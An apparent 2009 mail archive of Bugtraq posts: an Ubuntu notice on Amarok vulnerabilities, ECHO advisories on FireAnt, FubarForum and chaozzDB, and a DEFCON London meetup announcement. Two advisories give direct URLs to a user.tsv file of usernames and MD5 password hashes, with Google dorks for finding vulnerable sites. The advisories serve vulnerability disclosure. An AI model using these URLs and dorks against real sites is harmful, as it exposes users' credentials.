iEYEABECAAYFAkm+ueEACgkQLMAs/0C4zNoa6wCeMGZQUmNiwhZtQxNf2GqAMuo5
/FYAoIy8Hqfm8f2yUN1bzwOiQT7Exvhn
=kjGK
-----END PGP SIGNATURE-----

--=-72Xf5OB1ESqN41sN99U/--

From - Tue Mar 17 15:41:15 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006a9d
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39782-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 7F591ED8B6
for <lists@securityspace.com>; Tue, 17 Mar 2009 15:33:37 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 6CE41143A09; Tue, 17 Mar 2009 12:24:39 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 21241 invoked from network); 17 Mar 2009 17:28:36 -0000
Subject: [USN-739-1] Amarok vulnerabilities
From: Marc Deslauriers <marc.deslauriers@canonical.com>
Reply-To: Ubuntu Security <security@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
X-Original-To: marc.deslauriers@cleanmail.canonical.com
X-Mailcontrol-Inbound: 
 uq3drnD2P+ps5SfEb0fvr78+NoP1DHBZwGqKpaXB2eTgNv8D6KLIxb8+NoP1DHBZ8VSaBg0k0xwX-Spam-Score: -12.6
X-Scanned-By: MailControl A_08_51_00 (www.mailcontrol.com) on 10.74.0.158
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-3OLCXLRcPLlNVNdoK40p"
Date: Tue, 17 Mar 2009 13:29:25 -0400
Message-Id: <1237310965.6268.5.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.25.92 
Status:   


--=-3OLCXLRcPLlNVNdoK40p
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

===========================================================
Ubuntu Security Notice USN-739-1             March 17, 2009
amarok vulnerabilities
CVE-2009-0135, CVE-2009-0136
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  amarok                          2:1.4.7-0ubuntu3.2

Ubuntu 8.04 LTS:
  amarok                          2:1.4.9.1-0ubuntu3.2

Ubuntu 8.10:
  amarok                          2:1.4.10-0ubuntu3.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that Amarok did not correctly handle certain malformed
tags in Audible Audio (.aa) files. If a user were tricked into opening a
crafted Audible Audio file, an attacker could execute arbitrary code with
the privileges of the user invoking the program.


Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok_1.4.7-0ubuntu3.2.diff.gz
      Size/MD5:   257112 c9e74edffcb691c16e1128aa887c1bfd
    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok_1.4.7-0ubuntu3.2.dsc
      Size/MD5:     1066 e0d1dd2ce612be33f143bdaac11e3959
    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok_1.4.7.orig.tar.gz
      Size/MD5: 16103569 74cd355c6d4838695a8d5b914a5b7d77

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok-xine_1.4.7-0ubuntu3.2_amd64.deb
      Size/MD5:    62660 f88ae4c42572936a5ea969f42535b0b9
    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok_1.4.7-0ubuntu3.2_amd64.deb
      Size/MD5: 10060154 e93c8ffb9db8004cbd1d702cadaaec28
    http://security.ubuntu.com/ubuntu/pool/universe/a/amarok/amarok-engines_1.4.7-0ubuntu3.2_amd64.deb
      Size/MD5:      880 3bd14c1eed61be2a4992f3282bc6b0a4

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok-xine_1.4.7-0ubuntu3.2_i386.deb
      Size/MD5:    56632 ebf26ee4dd076e54782cf276a3cc888c
    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok_1.4.7-0ubuntu3.2_i386.deb
      Size/MD5:  9848998 b22ddae4b1ef24a58c42a65a0cb17c49
    http://security.ubuntu.com/ubuntu/pool/universe/a/amarok/amarok-engines_1.4.7-0ubuntu3.2_i386.deb
      Size/MD5:      882 037d4a5a94a88f3f09a25c0e7de86baf

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/a/amarok/amarok-xine_1.4.7-0ubuntu3.2_lpia.deb
      Size/MD5:    56376 d22b49f1bd640bed50d86ce8b630515b
    http://ports.ubuntu.com/pool/main/a/amarok/amarok_1.4.7-0ubuntu3.2_lpia.deb
      Size/MD5:  9840226 4bc0d7e4e7e0791d2af94e53f106a9c2
    http://ports.ubuntu.com/pool/universe/a/amarok/amarok-engines_1.4.7-0ubuntu3.2_lpia.deb
      Size/MD5:      880 7a48684acb8056df94e9ae04dbcb18e8

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok-xine_1.4.7-0ubuntu3.2_powerpc.deb
      Size/MD5:    62376 ba074f1110dc982df3a0d89321407dfc
    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok_1.4.7-0ubuntu3.2_powerpc.deb
      Size/MD5: 10058400 40ebc6949db67a6d169f03400e73f0bb
    http://security.ubuntu.com/ubuntu/pool/universe/a/amarok/amarok-engines_1.4.7-0ubuntu3.2_powerpc.deb
      Size/MD5:      884 17d6eb924c7960391e9192e92c7715f3

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok-xine_1.4.7-0ubuntu3.2_sparc.deb
      Size/MD5:    56966 54091e39c8cf0bc1d15335bfd760730a
    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok_1.4.7-0ubuntu3.2_sparc.deb
      Size/MD5:  9941278 7549394f977da613ced46cb06569c970
    http://security.ubuntu.com/ubuntu/pool/universe/a/amarok/amarok-engines_1.4.7-0ubuntu3.2_sparc.deb
      Size/MD5:      882 b07d32a7a9b65eba984692ff89281361

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok_1.4.9.1-0ubuntu3.2.diff.gz
      Size/MD5:    35541 ae027294b9ecd0cfef274bd7821e55d8
    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok_1.4.9.1-0ubuntu3.2.dsc
      Size/MD5:     1236 963e00d25ce78cea1cb687653382ffac
    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok_1.4.9.1.orig.tar.gz
      Size/MD5: 16055681 a4365f559f0d42a0a09c3e9a17f9a140

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok-xine_1.4.9.1-0ubuntu3.2_amd64.deb
      Size/MD5:    61972 e22ebf1259d6efc8df04a63c5f1f239b
    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok_1.4.9.1-0ubuntu3.2_amd64.deb
      Size/MD5:  9852912 749c0955241f580f604ec3cf737e29ba
    http://security.ubuntu.com/ubuntu/pool/universe/a/amarok/amarok-engines_1.4.9.1-0ubuntu3.2_amd64.deb
      Size/MD5:      892 8935cf386c89808423b31a971b8ba8f5

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok-xine_1.4.9.1-0ubuntu3.2_i386.deb
      Size/MD5:    55162 a708e7f15c28a78dbde8b0760a3c51e9
    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok_1.4.9.1-0ubuntu3.2_i386.deb
      Size/MD5:  9613228 7ad352acc25cb075a86a712b9dc9cde7
    http://security.ubuntu.com/ubuntu/pool/universe/a/amarok/amarok-engines_1.4.9.1-0ubuntu3.2_i386.deb
      Size/MD5:      894 327a4fab283176840a5c19c20da82a60

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/a/amarok/amarok-xine_1.4.9.1-0ubuntu3.2_lpia.deb
      Size/MD5:    55434 7e3ec4dd258b53d229e2a62f10f24ee0
    http://ports.ubuntu.com/pool/main/a/amarok/amarok_1.4.9.1-0ubuntu3.2_lpia.deb
      Size/MD5:  9634246 00939b00ed248dcb20ba48cb0f7d4e85
    http://ports.ubuntu.com/pool/universe/a/amarok/amarok-engines_1.4.9.1-0ubuntu3.2_lpia.deb
      Size/MD5:      892 08de17b51f8dc7e1718a538354793d96

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/a/amarok/amarok-xine_1.4.9.1-0ubuntu3.2_powerpc.deb
      Size/MD5:    60480 78a345b9355403c9e15fc40b2060729a
    http://ports.ubuntu.com/pool/main/a/amarok/amarok_1.4.9.1-0ubuntu3.2_powerpc.deb
      Size/MD5:  9814058 c455622225259b65b52190de1ac2f411
    http://ports.ubuntu.com/pool/universe/a/amarok/amarok-engines_1.4.9.1-0ubuntu3.2_powerpc.deb
      Size/MD5:      894 21fee2e334c017d67035c1a855a76232

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/a/amarok/amarok-xine_1.4.9.1-0ubuntu3.2_sparc.deb
      Size/MD5:    55462 b7b35cb1a49407c5b1744e75be35be96
    http://ports.ubuntu.com/pool/main/a/amarok/amarok_1.4.9.1-0ubuntu3.2_sparc.deb
      Size/MD5:  9703894 cbbc84b5f72149a1e6b77e2a3767b32a
    http://ports.ubuntu.com/pool/universe/a/amarok/amarok-engines_1.4.9.1-0ubuntu3.2_sparc.deb
      Size/MD5:      894 ec9b2171cfa95bb7d5f5eb00234a29c7

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok_1.4.10-0ubuntu3.1.diff.gz
      Size/MD5:   122128 dfa7f91f4b47877f2ae0ad628cd1cb34
    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok_1.4.10-0ubuntu3.1.dsc
      Size/MD5:     1692 85e473b48ec7618853a7ef4ec9f676f3
    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok_1.4.10.orig.tar.gz
      Size/MD5: 16207150 3d0670537b74e929909aa9fa5dc98ccf

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok-common_1.4.10-0ubuntu3.1_all.deb
      Size/MD5:  7189098 14810af1ad0beaceaa6d4ffdef262303
    http://security.ubuntu.com/ubuntu/pool/universe/a/amarok/amarok-engines_1.4.10-0ubuntu3.1_all.deb
      Size/MD5:    20876 5e4197198c821aa5ba7b4bf4aa880c48

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok-dbg_1.4.10-0ubuntu3.1_amd64.deb
      Size/MD5: 11263374 3cd56f5c0137f627c7a1b6cf4da65b8f
    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok-engine-xine_1.4.10-0ubuntu3.1_amd64.deb
      Size/MD5:    77300 ec981ba68cfd40da2c0d1bcc732bb6ad
    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok_1.4.10-0ubuntu3.1_amd64.deb
      Size/MD5:  2555918 aa8ca60da603dde4ad17abf9a3f9413c
    http://security.ubuntu.com/ubuntu/pool/universe/a/amarok/amarok-engine-yauap_1.4.10-0ubuntu3.1_amd64.deb
      Size/MD5:    44786 19864173750f5e0cfecb9cd0e5ecb93c

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok-dbg_1.4.10-0ubuntu3.1_i386.deb
      Size/MD5: 11214674 209fb4b55cccb46924b49aa311cd7fd2
    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok-engine-xine_1.4.10-0ubuntu3.1_i386.deb
      Size/MD5:    73120 ac2195787b0f20e49f0f2c4600af8e0a
    http://security.ubuntu.com/ubuntu/pool/main/a/amarok/amarok_1.4.10-0ubuntu3.1_i386.deb
      Size/MD5:  2455166 10a4d45271de505b27335b03e63e65e7
    http://security.ubuntu.com/ubuntu/pool/universe/a/amarok/amarok-engine-yauap_1.4.10-0ubuntu3.1_i386.deb
      Size/MD5:    42068 27fda4967f148fae1cc9368c2a864580

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/a/amarok/amarok-dbg_1.4.10-0ubuntu3.1_lpia.deb
      Size/MD5: 11001132 58d91d53551248da242004538f8cf4e1
    http://ports.ubuntu.com/pool/main/a/amarok/amarok-engine-xine_1.4.10-0ubuntu3.1_lpia.deb
      Size/MD5:    72996 700366415eb1979682355bf3321116eb
    http://ports.ubuntu.com/pool/main/a/amarok/amarok_1.4.10-0ubuntu3.1_lpia.deb
      Size/MD5:  2466854 1e8371a2ecd057dd132b734dd90123ae
    http://ports.ubuntu.com/pool/universe/a/amarok/amarok-engine-yauap_1.4.10-0ubuntu3.1_lpia.deb
      Size/MD5:    42324 46e91ba8d21b8a07bb55908baa31ff36

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/a/amarok/amarok-dbg_1.4.10-0ubuntu3.1_powerpc.deb
      Size/MD5: 11630608 f396b5277dae7a48eb99f96d0286f5ef
    http://ports.ubuntu.com/pool/main/a/amarok/amarok-engine-xine_1.4.10-0ubuntu3.1_powerpc.deb
      Size/MD5:    77218 14a66ad0995715007e05ae0c4391ee36
    http://ports.ubuntu.com/pool/main/a/amarok/amarok_1.4.10-0ubuntu3.1_powerpc.deb
      Size/MD5:  2553480 8b214c82fd0facc88be1784c4cf72c0c
    http://ports.ubuntu.com/pool/universe/a/amarok/amarok-engine-yauap_1.4.10-0ubuntu3.1_powerpc.deb
      Size/MD5:    46030 fcdb0545bd8a26124a2bb70604e3ac18

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/a/amarok/amarok-dbg_1.4.10-0ubuntu3.1_sparc.deb
      Size/MD5: 11005590 628b0d7d4425387d5aaf37a3ea983964
    http://ports.ubuntu.com/pool/main/a/amarok/amarok-engine-xine_1.4.10-0ubuntu3.1_sparc.deb
      Size/MD5:    72268 c8b1b20037f189d7237cbdad98756147
    http://ports.ubuntu.com/pool/main/a/amarok/amarok_1.4.10-0ubuntu3.1_sparc.deb
      Size/MD5:  2398662 ee7c646f35ddc367817de4e0922a36d7
    http://ports.ubuntu.com/pool/universe/a/amarok/amarok-engine-yauap_1.4.10-0ubuntu3.1_sparc.deb
      Size/MD5:    41892 f5579da5c9e5da9a312dd61e13d1d6e2



--=-3OLCXLRcPLlNVNdoK40p
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkm/3fIACgkQLMAs/0C4zNoUcQCgpPM20WXeVEhZgBqCchRbBTSA
l28AniHy7fLz8IbUh/G7zPsNuwZg4HYc
=RNkQ
-----END PGP SIGNATURE-----

--=-3OLCXLRcPLlNVNdoK40p--

From - Tue Mar 17 15:51:15 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006a9e
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39780-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 0415BED961
for <lists@securityspace.com>; Tue, 17 Mar 2009 15:42:48 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id EB43B1439FB; Tue, 17 Mar 2009 12:23:51 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 16075 invoked from network); 17 Mar 2009 16:07:46 -0000
Date: 17 Mar 2009 16:08:20 -0000
Message-ID: <20090317160820.15557.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: vuln@e-rdc.org
To: bugtraq@securityfocus.com
Subject: [ECHO_ADV_106$2009] FireAnt <= 1.3 Critical File Disclosure
 Vulnerability
Status:   

ECHO_ADV_106$2009

-----------------------------------------------------------------------------------------
[ECHO_ADV_106$2009] FireAnt <= 1.3 Critical File Disclosure Vulnerability
-----------------------------------------------------------------------------------------

Author       : K-159
Date         : March, 16 th 2009
Location     : Jakarta, Indonesia
Web          : http://e-rdc.org/v1/news.php?readmore0
Critical Lvl : Moderate
Impact       : Exposure of sensitive information
Where        : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : FireAnt
version     : <= 1.3
Vendor      : http://chaozz.nl/software/fireant/
Description :

FireAnt is a Bug Tracking System (BTS) without the fancy bells �n whistles. It�s very small (about 30 kb) and easy to install/maintain (no MYSQL needed).
It�s a really straight forward simple BTS, initially made to support the FreeWebshop.org project.

--------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

Critical user.tsv file in db's folder are vulnerable to direct access to view 'critical' information about username and md5hash password from users.


Poc/Exploit:
~~~~~~~~~
http://www.example.com/[FireAnt_path]/db/user.tsv

Dork:
~~~~~
Google : "Powered by FireAnt v1.3 and chaozzDB v1.2"


Solution:
~~~~~~~

- add .htaccess in folder db.

Timeline:
~~~~~~~~~

- 14 - 03 - 2009 bug found
- 14 - 03 - 2009 vendor contacted
- 15 - 03 - 2009 vendor response
- 16 - 03 - 2009 advisory release
---------------------------------------------------------------------------

Shoutz:
~~~~~
~ ping - my dearest wife, zizou - my beloved son, i-eyes - my beloved daughter.
~ y3dips,the_day,Negatif,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,
the_hydra,neng chika, str0ke
~ scanners [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ SK,Abond,pokley,cybertank, super_temon,whatsoever,b120t0,inggar,fachri,adi,rahmat,indra
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b,cR4SH3R,ogeb,bagan,devsheed
~ dr188le,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,ghostblup,shamus,
kuntua, stev_manado,nofry,k1tk4t,0pt1c,k1ngk0ng
~ newbie_hacker@yahoogroups.com
~ milw0rm.com, macaholic.info, unitiga.com, mac.web.id, indowebster.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~

K-159 || echo|staff || adv[at]e-rdc[dot]org
Homepage: http://www.e-rdc.org/

-------------------------------- [ EOF ] ---------------------------------- 

From - Tue Mar 17 15:51:16 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006a9f
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39781-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id B3B2EED932
for <lists@securityspace.com>; Tue, 17 Mar 2009 15:48:03 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 44BC8143A08; Tue, 17 Mar 2009 12:24:05 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 16196 invoked from network); 17 Mar 2009 16:09:23 -0000
Date: 17 Mar 2009 16:09:58 -0000
Message-ID: <20090317160958.15700.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: vuln@e-rdc.org
To: bugtraq@securityfocus.com
Subject: [ECHO_ADV_107$2009] FubarForum <= 1.6 Critical File Disclosure
 Vulnerability
Status:   

ECHO_ADV_107$2009

-----------------------------------------------------------------------------------------
[ECHO_ADV_107$2009] FubarForum <= 1.6 Critical File Disclosure Vulnerability
-----------------------------------------------------------------------------------------

Author       : K-159
Date         : March, 16 th 2009
Location     : Jakarta, Indonesia
Web          : http://e-rdc.org/v1/news.php?readmore1
Critical Lvl : Moderate
Impact       : Exposure of sensitive information
Where        : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : FubarForum
version     : <= 1.6
Vendor      : http://chaozz.nl/software/fubarforum/
Description :

FubarForum is a tiny flatfile (no MYSQL needed) messageboard / forum that is easy to install and use. It�s small (compressed around 60kb), but has all the features you might expect from a forum

--------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

Critical user.tsv file in db's folder are vulnerable to direct access to view 'critical' information about username and md5hash password from users.


Poc/Exploit:
~~~~~~~~~
http://www.example.com/[fubarforum_path]/db/user.tsv

Dork:
~~~~~
Google : "Powered by FubarForum v1.6 and chaozzDB v1.2"


Solution:
~~~~~~~

- add .htaccess in folder db.

Timeline:
~~~~~~~~~

- 14 - 03 - 2009 bug found
- 14 - 03 - 2009 vendor contacted
- 15 - 03 - 2009 vendor response
- 16 - 03 - 2009 advisory release
---------------------------------------------------------------------------

Shoutz:
~~~~~
~ ping - my dearest wife, zizou - my beloved son, i-eyes - my beloved daughter.
~ y3dips,the_day,Negatif,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,
the_hydra,neng chika, str0ke
~ scanners [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ SK,Abond,pokley,cybertank, super_temon,whatsoever,b120t0,inggar,fachri,adi,rahmat,indra
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b,cR4SH3R,ogeb,bagan,devsheed
~ dr188le,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,ghostblup,shamus,
kuntua, stev_manado,nofry,k1tk4t,0pt1c,k1ngk0ng
~ newbie_hacker@yahoogroups.com
~ milw0rm.com, macaholic.info, unitiga.com, mac.web.id, indowebster.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~

K-159 || echo|staff || adv[at]e-rdc[dot]org
Homepage: http://www.e-rdc.org/

-------------------------------- [ EOF ] ---------------------------------- 

From - Tue Mar 17 16:01:16 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006aa1
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39783-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id DE6A3ED942
for <lists@securityspace.com>; Tue, 17 Mar 2009 16:00:35 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 725A3143873; Tue, 17 Mar 2009 12:26:40 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 20794 invoked from network); 17 Mar 2009 17:17:30 -0000
X-Authentication-Warning: smtp0.thebunker.net: Host 78-105-4-70.zone3.bethere.co.uk [78.105.4.70] claimed to be [10.241.6.194]
Message-ID: <49BFDB3A.5000908@pirate-radio.org>
Date: Tue, 17 Mar 2009 17:17:46 +0000
From: Major Malfunction <majormal@pirate-radio.org>
User-Agent: Thunderbird 2.0.0.19 (X11/20090105)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: DEFCON London DC4420 March meeting - Thursday 19th March
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: ClamAV 0.94.2/9121/Tue Mar 17 14:50:06 2009 on livid.thebunker.net
X-Virus-Status: Clean
X-Spam-Status: No, score=-1.2 required=5.0 tests=AWL,BAYES_00,RDNS_DYNAMIC
autolearn=no version=3.2.5
X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on livid.thebunker.net
Status:   

Yes it's that time of the month already! We need to meet in west London 
and drink beer! Errr... I mean talk about techy hacky stuff...

This month we've got Dominic giving us an update on his Bluetooth Foo, 
and, in an attempt to encourage some more speakers to come forward, the 
rest of the session will be devoted only to lightning talks, starting 
with a Dradis overview by etd.

So, if you've got an idea, or a germ of an idea, a few slides or no 
slides at all, come and tell us about it and get some genuine feedback, 
expressions of interest, offers of collaboration, or just shock and awe, 
depending on how leet your shizzle is... :)

Location is, as usual, upstairs at The Glassblower in Soho
42 Glasshouse St, Piccadilly, W1B 5JY
 
http://maps.google.com/maps?f=q&hl=en&geocode=&q=W1B+5DL&ie=UTF8&llQ.510625,-0.136878&spn=0.00629,0.021415&z&iwloc�dr

They do good food and real ales, and we have the bar exclusively to 
ourselves until kicking out time...

Talks start at 19:30.

See you there!

cheers,
MM
-- 
"In DEFCON, we have no names..." errr... well, we do... but silly ones...

From - Tue Mar 17 16:51:16 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006aa3
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39779-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 9339DED8A6
for <lists@securityspace.com>; Tue, 17 Mar 2009 16:48:26 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 0D04E1437E8; Tue, 17 Mar 2009 12:23:34 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 15893 invoked from network); 17 Mar 2009 16:05:57 -0000
Date: 17 Mar 2009 16:06:32 -0000
Message-ID: <20090317160632.15345.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: vuln@e-rdc.org
To: bugtraq@securityfocus.com
Subject: [ECHO_ADV_105$2009] chaozzDB <= 1.2 Critical File Disclosure
 Vulnerability
Status:   

ECHO_ADV_105$2009

-----------------------------------------------------------------------------------------
[ECHO_ADV_105$2009] chaozzDB <= 1.2 Critical File Disclosure Vulnerability
-----------------------------------------------------------------------------------------

Author       : K-159
Date         : March, 16 th 2009
Location     : Jakarta, Indonesia
Web          : http://e-rdc.org/v1/news.php?readmore9
Critical Lvl : Moderate
Impact       : Exposure of sensitive information
Where        : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : chaozzDB
version     : <= 1.2
Vendor      : http://chaozz.nl/software/chaozzdb/
